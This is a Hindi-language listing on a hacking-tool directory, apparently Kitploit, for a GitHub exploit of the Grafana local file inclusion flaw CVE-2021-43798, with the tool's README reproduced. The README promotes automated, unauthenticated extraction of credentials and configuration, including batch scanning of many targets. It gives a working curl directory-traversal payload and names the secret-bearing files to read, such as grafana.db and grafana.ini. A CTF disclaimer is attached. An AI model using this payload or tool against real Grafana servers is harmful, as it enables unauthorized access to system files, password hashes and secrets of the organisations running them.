Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/kikechans/-grafana-lfi-cve-2021-43798
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनाCTFपेनिट्रेशन टेस्टिंग
GitHubkikechans/-grafana-lfi-cve-2021-43798

-Grafana-LFI-CVE-2021-43798

📂 Grafana LFI Exploit (CVE-2021-43798). क्रेडेंशियल और कॉन्फ़िगरेशन की स्वचालित निकासी। 🕵️

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

🚀 Grafana LFI Exploit (CVE-2021-43798)

Grafana (8.0.0 से 8.3.0 संस्करणों) में Local File Inclusion (LFI) भेद्यता का शोषण करने के लिए Python 3 स्वचालन स्क्रिप्ट। यह एक्सप्लॉइट बिना प्रमाणीकरण के ऑपरेटिंग सिस्टम की संवेदनशील फ़ाइलों को पढ़ने के लिए directory traversal करने की अनुमति देता है। ✨ विशेषताएँ

root@kitploit:~
Python 3.10+ संगतता: आधुनिक Python संस्करणों के साथ काम करने के लिए पैच किया गया (collections.Mapping का सुधार)।

बैच स्कैनिंग: targets.txt फ़ाइल के माध्यम से कई लक्ष्यों को संसाधित करने की क्षमता।

डेटा डिक्रिप्शन: Grafana के सत्रों और एन्क्रिप्टेड डेटा को संभालने के लिए मॉड्यूल शामिल हैं।

CTF के लिए अनुकूलित: स्वच्छ और सीधा आउटपुट, HackTheBox और TryHackMe जैसे लैब्स के लिए आदर्श।

🛠️ आवश्यकताएँ और इंस्टॉलेशन

पुरानी लाइब्रेरी निर्भरताओं के कारण, निम्नलिखित पैकेज स्थापित करने की अनुशंसा की जाती है: Bash

pip3 install PyInquirer termcolor requests pycryptodome --break-system-packages

root@kitploit:~
नोट: यदि आप Python 3.10 या उससे ऊपर का उपयोग करते हैं, तो स्क्रिप्ट collections.abc के साथ संगतता के लिए एक स्वचालित पैच शामिल करती है।

🚀 उपयोग

root@kitploit:~
लक्ष्य कॉन्फ़िगर करें: targets.txt फ़ाइल में URLs (पोर्ट के साथ) जोड़ें।
Bash

echo "http://10.129.234.47:3000" > targets.txt

एक्सप्लॉइट चलाएँ:
Bash

python3 exploit.py

🎯 सामान्य पठन लक्ष्य (LFI)

एक बार चलाने के बाद, आप निम्न जैसी महत्वपूर्ण फ़ाइलें पढ़ने का प्रयास कर सकते हैं:

root@kitploit:~
/etc/passwd (सिस्टम उपयोगकर्ता)

/var/lib/grafana/grafana.db (उपयोगकर्ताओं के हैश वाला डेटाबेस)

/etc/grafana/grafana.ini (कॉन्फ़िगरेशन और रहस्य)

💡 वैकल्पिक तरीका (मैनुअल)

यदि आप स्क्रिप्ट का उपयोग नहीं करना चाहते हैं, तो आप curl के माध्यम से सीधे LFI का शोषण कर सकते हैं: Bash

curl --path-as-is "http://<TARGET_IP>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

⚠️ अस्वीकरण

यह रिपॉजिटरी विशेष रूप से शैक्षिक उद्देश्यों और नियंत्रित वातावरण (CTFs, लैब्स) में उपयोग के लिए बनाई गई है। लेखक इस उपकरण के दुरुपयोग के लिए ज़िम्मेदार नहीं है। 🏷️ टॉपिक्स (लेबल)

grafana, cve-2021-43798, lfi, exploit, pentesting, hackthebox, python3, directory-traversal

टूल डाउनलोड करें